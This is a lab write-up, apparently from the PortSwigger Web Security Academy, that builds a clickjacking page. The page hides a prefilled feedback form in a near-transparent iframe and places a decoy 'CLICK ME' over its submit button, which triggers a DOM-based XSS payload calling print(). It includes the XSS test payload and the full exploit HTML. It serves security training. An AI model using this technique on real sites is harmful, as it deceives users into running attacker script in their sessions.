Exploiting clickjacking vulnerability to trigger DOM based XSS

Desciption

This lab contains an XSS vulnerability that is triggered by a click. Construct a clickjacking attack that fools the user into clicking the "Click me" button to call the print() function.

Approach

After accessing the lab, I logged in with the provided credentials. Since this lab is about triggering DOM-based XSS through Clickjacking, I started searching for the XSS vulnerability.

I came across a feedback form with the following fields:

name=ichyaboy
email=ichyaboy%40hacker.com
subject=Shikamaru
message=nothing+to+be+written+here

I noticed that my input in the Name field is reflected in a span after submitting the form:

<span id="feedbackResult">Thank you for submitting feedback, ichyaboy!</span>

I immediately injected a simple XSS payload in the Name field to trigger an alert:

<img src=1 onerror=alert(1)>

After filling in the other fields and submitting the form, I saw that the alert box popped up, confirming the DOM-XSS. Now I needed to build my exploit HTML page. This page would have an invisible iframe rendering the feedback page with the form fully filled to avoid any "empty field" issues. I would then place a simple "Click me" sentence above the invisible "Submit feedback" button.

My exploit page looked like this:

<style>
    iframe {
        position:relative;
        width: 1000px;
        height: 1000px;
        opacity: 0.00001;
        z-index: 2;
    }
    div {
        position:absolute;
        top: 805px;
        left: 60px;
        z-index: 1;
    }
</style>
<div>CLICK ME</div>
<iframe src="https://0a2600ad037005ba82aebb0e005b0096.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=ichyaboyboy@hacker.com&subject=nothing&message=nothing"></iframe>

This HTML page has two main elements: an iframe and a div. The iframe contains the /feedback page and is set to a relative position in CSS, meaning it remains within the normal document flow. The div, containing the "CLICK ME" text, has an absolute position, meaning it does not affect the layout of other elements and is not affected by them.

When the victim visits this exploit page, they will see only the "CLICK ME" text. Clicking this text, which is not an actual link or button, triggers the underlying "Submit feedback" button in the invisible iframe, which has an opacity of 0.00001, making it virtually invisible to the user. Since the whole form is already filled, the form will be successfully submitted, and the XSS will be triggered.

By copying this exploit into the body of the HTML page on the exploit server and delivering it, the lab is solved, confirming the execution of the XSS payload.

PreviousClickjacking with a frame buster script NextMultistep clickjacking